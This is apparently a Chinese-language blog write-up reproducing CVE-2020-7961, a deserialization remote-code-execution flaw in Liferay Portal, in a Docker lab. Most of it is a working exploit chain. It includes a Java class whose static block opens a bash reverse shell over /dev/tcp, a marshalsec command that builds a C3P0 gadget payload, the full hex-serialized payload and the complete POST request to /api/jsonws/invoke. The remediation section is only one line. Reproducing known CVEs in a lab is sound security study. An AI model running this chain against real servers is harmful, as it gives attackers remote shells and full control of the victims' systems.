si1ent

CVE-2020-7961

2021-03-04

概述

百度百科

liferay是一个现成的,即开即用的,功能完备的门户网站Liferay Portal,是一个完美的桌面协同办公组合,完全为企业和机构设计,并且可以随意适应不同的应用Liferay Social Office. 提供60余种工具和一系列当今最富创新意识的技术,可以创建Web站点、内部网,以此来向适当的客户群显示符合他们的文档和应用程序。

环境搭建

docker

建议为docke内存设置在2G内存以上防止启动不了

image-20210304164356616

image-20210304164422723

漏洞实战分类

CVE-2020-7961

漏洞描述

Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。

影响范围

Liferay Portal 6.1

Liferay Portal 6.2

Liferay Portal 7.0

Liferay Portal 7.1

Liferay Portal 7.2

漏洞原理

Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。

漏洞条件

Liferay Portal 6.1

Liferay Portal 6.2

Liferay Portal 7.0

Liferay Portal 7.1

Liferay Portal 7.2

漏洞检测

1、URL访问

1
http://192.168.10.51:8080/

image-20210304164742226

2、首先准备恶意的Java类

1
2
3
4
5
6
7
8
9
10
11
12
//LifeExp.java
public class LifExp {

static {
try {
String[] cmd = {"bash","-c","bash -i >& /dev/tcp/192.168.10.51/4444 0>&1"};
java.lang.Runtime.getRuntime().exec(cmd).waitFor();
} catch ( Exception e ) {
e.printStackTrace();
}
}
}

3、本地编译

1
➜  test javac LifExp.java

image-20210304165245171

4、此目录构造web

1
➜  test python -m SimpleHTTPServer 9999

image-20210304165342434

5、PoC生成

因目标Java版本较高,我们使用利用链是com.mchange.v2.c3p0.WrapperConnectionPoolDataSource,借助marshalsec来生成一个适用于Jackson的POC:

http://192.168.10.51:9999/构造的web服务

LifExp恶意Java类名

1
➜  test java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson C3P0WrapperConnPool http://192.168.10.51:9999/ LifExp

生成的Payload是Jackson使用的,我们只需按照Liferay Portal的形式,即+参数名:类名=值,来修改这个Payload:

1
+defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c696645787074001a687474703a2f2f3139322e3136382e31302e35313a393939392f740003466f6f;"}

image-20210304170520966

6、nc监听

1
➜  ~ nc -lvnp 4444

7、将以上PoC提交POST

注意:

修改HTTP请求头时记得修改Content-Type类型如下,不然无法运行PoC

1
2
3
4
5
6
7
8
9
10
11
POST /api/jsonws/invoke HTTP/1.1
Host: 192.168.10.51:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4239.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1352

cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=o3lt8q1F&formDate=1585270368703&tableId=1&name=2&type=3&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:aced00057372003d636f6d2e6d6368616e67652e76322e6e616d696e672e5265666572656e6365496e6469726563746f72245265666572656e636553657269616c697a6564621985d0d12ac2130200044c000b636f6e746578744e616d657400134c6a617661782f6e616d696e672f4e616d653b4c0003656e767400154c6a6176612f7574696c2f486173687461626c653b4c00046e616d6571007e00014c00097265666572656e63657400184c6a617661782f6e616d696e672f5265666572656e63653b7870707070737200166a617661782e6e616d696e672e5265666572656e6365e8c69ea2a8e98d090200044c000561646472737400124c6a6176612f7574696c2f566563746f723b4c000c636c617373466163746f72797400124c6a6176612f6c616e672f537472696e673b4c0014636c617373466163746f72794c6f636174696f6e71007e00074c0009636c6173734e616d6571007e00077870737200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78700000000000000000757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000a70707070707070707070787400064c696645787074001a687474703a2f2f3139322e3136382e31302e35313a393939392f740003466f6f;"}

image-20210304170717605

漏洞修复

官网已修复及时更新

参考
1
2
3
4
5
https://github.com/vulhub/vulhub/tree/master/liferay-portal/CVE-2020-7961
https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html
https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Liferay%20Portal%20CVE-2020-7961%20%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/
https://xz.aliyun.com/t/7499
https://xz.aliyun.com/t/7485
Tags: CVE
使用支付宝打赏
使用微信打赏

若你觉得我的文章对你有帮助,欢迎点击上方按钮对我打赏

扫描二维码,分享此文章